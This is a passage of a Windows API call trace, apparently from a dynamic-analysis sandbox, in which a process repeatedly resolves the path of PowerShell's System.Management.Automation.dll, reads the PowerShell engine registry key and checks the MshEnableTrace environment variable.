	[0146.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.888] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d638 | out: phkResult=0x14d638*=0x39c) returned 0x0
	[0146.889] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d5bc, lpData=0x0, lpcbData=0x14d5b8*=0x0 | out: lpType=0x14d5bc*=0x1, lpData=0x0, lpcbData=0x14d5b8*=0x56) returned 0x0
	[0146.889] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d62a0
	[0146.889] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d58c, lpData=0x1b7d62a0, lpcbData=0x14d588*=0x56 | out: lpType=0x14d58c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d588*=0x56) returned 0x0
	[0146.889] CoTaskMemFree (pv=0x1b7d62a0) 
	[0146.889] RegCloseKey (hKey=0x39c) returned 0x0
	[0146.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.892] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.892] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
